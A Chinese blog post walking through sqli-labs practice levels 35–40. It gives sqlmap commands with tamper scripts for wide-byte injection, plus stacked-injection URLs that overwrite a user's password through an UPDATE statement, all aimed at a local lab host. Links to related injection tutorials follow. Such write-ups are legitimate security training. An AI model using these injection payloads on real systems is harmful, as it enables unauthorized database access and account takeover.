SQLMAP脚本-sql-labs-Less-35-40

最新推荐文章于 2023-02-23 16:10:23 发布
最新推荐文章于 2023-02-23 16:10:23 发布
阅读量204 收藏
点赞数
文章标签: sql 数据库 网络安全 less python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69844818/article/details/128558767
版权

Less-35

 

 直接跑就行了数字型python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-35/?id=1" --technique=U --users --tamper=cx.py,air.py

Less-36

 

 

使用了mysql_real_escape_string过滤,但设置了gbk编码所以可以使用宽字节注入

 

python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-36/?id=1" --technique=U --users --tamper=unmagicquotes.py,air.py  --level=2

Less-37

这关需要抓包注入剩下的跟宽字节注入都一样

python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-37/" --data="uname=admin*&passwd=admin&submit=Submit" --technique=U --users --tamper=unmagicquotes.py,air.py --level=2

it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] n //注意sqlmap跳出来的这个选项需要选择n不然跑步出来 

Less-38

 直接注入即可

python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-38/?id=1"  --technique=U --users --tamper=unmagicquotes.py,air.py --level=2

 但是这关不是叫注入而是堆叠注入

什么是堆叠注入?

顾名思义,堆叠注入就是将一堆sql语句叠加在一起执行,使用分号结束上一个语句再叠加其他语句一起执行。(就是;分割语句同时执行)
先看看这种情况的后端代码是什么样子的

 使用了mysqli_multi_query() 函数,可以执行多个数据库查询语句,多个查询使用分号分割

 http://192.168.0.101/2022.10.26/sqli-labs-master/Less-38/?id=1%27;update%20users%20set%20password=%27123456%27%20where%20username=%27Dumb%27;--+

 给用户更改密码

 这里使用sqlmap跑也可以但是有点麻烦以后在补上吧


Less-39

 http://192.168.0.101/2022.10.26/sqli-labs-master/Less-39/?id=1;update%20users%20set%20password=%27123456%27%20where%20username=%27Dumb%27;--+

 也是同样的方法只不过是不需要双引号了


Less-40

 这关是无报错而已其他相同直接跑即可
python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-40/?id=1"  --technique=U --users --tamper=air.py --level=2

小恐龙观铃
关注
网络安全-sqlmap实战之sqlilabs-Less11_less11的sql注入用sqlmap数据库dump
2401_84248681的博客
04-29 229
错误回显sql语句猜测。
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
最新发布
m0_73615178的博客
03-03 1073
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注,POST数据盲注。 资料参考:https://blog.csdn.net/Kevinhanser/article/details/81215985
SQLMAP脚本-sql-labs-Less-30-34
m0_69844818的博客
01-04 456
和上一关一样先使用上一关的脚本跑一下发现跑不出来了,看一下后端代码按道理只是把单引号换成了双引号,sqlmap应该是会尝试双引号注入但我怎么跑都跑步出来,尝试在脚本里面手动替换双引号
SQLMAP脚本-sql-labs-Less-26-27a
m0_69844818的博客
09-19 1717
sqlmap脚本sqli-labs
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
SQLi Labs writeup (附py脚本
Le0nis的博客
07-22 1901
less-1GET – 报错注入 – 单引号 – 字符型 PHP代码为: SELECT * FROM users WHERE id='$id' LIMIT 0,1 SQL实际语句为: SELECT * FROM users WHERE id='1' LIMIT 0,1; 1、判断注入 ?id=1
sql-labs 1-10关 含多种解法 包括sqlmap py脚本
07-23
#### Less-1:基本SQL注入 在这一关中,玩家将面对一个常见的SQL注入点。注入点出现在URL参数中,例如`?id=1'`。此关卡旨在考察用户是否了解SQL注入的基本原理及其应用。 **知识点解析**: - **SQL注入基础**:...
sqlmap使用教程(sqli-labs1-10详解)
小同的博客
05-22 4641
-u 指定目标URL (可以是http协议也可以是https协议) -d 连接数据库 --dbs 列出所有的数据库 --current-db 列出当前数据库 --tables 列出当前的表 --columns 列出当前的列 -D 选择使用哪个数据库 -T 选择使用哪个表 -C 选择使用哪个列 --dump 获取字段中的数据 --batch 自动选择yes --smart 启发式快速判断,节约浪费时间 --forms 尝试使用post注入 -r 加载文件中的HTTP请求(本地保存的请
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3094
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
sqli-labs的第15关的布尔脚本(附代码分析)
skoyine的博客
05-02 1493
sqli-labs的第15关布尔盲注脚本 因为最近在复习python,所以找个项目练练手,本人是个菜鸡,代码哪里有问题欢迎大佬指出 import requests import time host = "http://127.0.0.1/sqli-labs/Less-15/" def getDatabase(): # 获取数据库名 global host ans = '' # 最外面的循环是数据库名的字符长度,就是从第几个字符开始
sqli-labs boolean-based 盲注脚本
lixiangminghate的专栏
06-24 2325
sqli-labs从Less8到Less10是盲注练习:大家在看lcarmy做练习Less5时应该发现他手动输入了含有payload的url。的确,出于演示目的,显得条理很清晰;但是,这样做的重复工作量实在太大了,做完这样的练习至少需要不厌其烦的耐心!我觉得,做这类练习的人,或多或少写过代码,所以肯定会想到用脚本之类的工具代替重复工作。在此,提供一份脚本,实现以上目的。...
SQL注入漏洞测试(宽字节)——sqlmap脚本
渗透测试
09-08 1088
sqlmap宽字节注入: 直接使用sqlmap跑——不好使 加参数(脚本) --batch -v 3 --tamper “unmagicquotes.py"——好使 不能注入可以在后面加上 --dbms mysql 后面使用平常注入流程 视频链接 SQL注入漏洞测试(宽字节)——sqlmap脚本跑 ...
sqli-labs布尔盲注脚本的编写
0xdawn的博客
03-12 1396
0x00 前言 此脚本基于sqli-labs/Less-5编写,采用ASCII码判断布尔类型,注入标志为"You are in…"。 第一次独立编写完整脚本,感觉很多地方写的不好。条件分支,字典、列表的遍历都花了很长时间去弄 无论是时间复杂度还是代码可读性,感觉都很拉跨。师傅们轻喷。。。 以下是模块解析 0x01 模块 1.判断数据库库名长度 def db_length(): db_l...
sqli-labs通关全解---关于盲注脚本的编写--less7-10-4
cyynid的博客
01-10 603
盲注
宽字节手注+sqlmap
lc0813的博客
07-31 327
ctf:有趣的注入 (一)手注: url:http://ctf.cdusec.org:8086/sqli.php?id=1 实验工具:火狐hackbar x001: 输入:” ‘ “单引号无反应,再输入" %df’ "(宽字节注入,显示报错。) 截图: 在这里插入图片描述 在这里插入图片描述 x002判断列数:判断出来有3列。 http://ctf.cdusec.org:8086/sqli...
sql_labs通关,手动加sqlmap
qq_47289634的博客
02-23 974
信息收集: 数据库版本:version()数据库名字:database() 数据库用户:user() 系统:@@version_compile_os MySQL5.0以上版本自带一个information_schema数据库,储存所有的数据库名表名列名 数据库中 . (点)代表下一级 student.users 代表student数据库中的users表看我另外一篇,点击下方蓝色字体sqlmap详细使用方法id=1,id=2返回类内容不同,输入的内容是带入到数据库里面查询了。 判断类型:这里我把源代码输出了
sqlmapsql labs下使用
qq_1062290728的博客
08-02 1481
本文主要是写sqlmapsql labs下的使用学习记录,目的在于模拟黑盒测试,不太在意原理。(当然,原理还是要学习好才这么干的。) 不得不说收获还是蛮大的。首先推荐下sqlmap使用的学习视频。 1-9: python sqlmap.py -u http://127.0.0.1/sqlilabs/Less-1/?id=1 --batch 10:单独的sleep(5)不起效果, [http://127.0.0.1/sqlilabs/Less-10/?id=1%22and%20If(ascii(subst
sqlmap使用_sqlmapsql labs下使用
weixin_39526415的博客
11-26 737
本文主要是写sqlmapsql labs下的使用学习记录,目的在于模拟黑盒测试,不太在意原理。(当然,原理还是要学习好才这么干的。)不得不说收获还是蛮大的。首先推荐下sqlmap使用的学习视频。1-9:python sqlmap.py -u http://127.0.0.1/sqlilabs/Less-1/?id=1 --batch10:单独的sleep(5)不起效果,[http://127.0...
如何利用sqlmap--sql-shell
06-11
使用`--sql-shell`选项可以让你在目标数据库上执行任意的SQL语句。以下是使用`--sql-shell`选项的基本步骤: 1. 首先,使用SQLMap进行探测并确认数据库注入漏洞是否存在。可以使用以下命令进行探测: ``` sqlmap...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值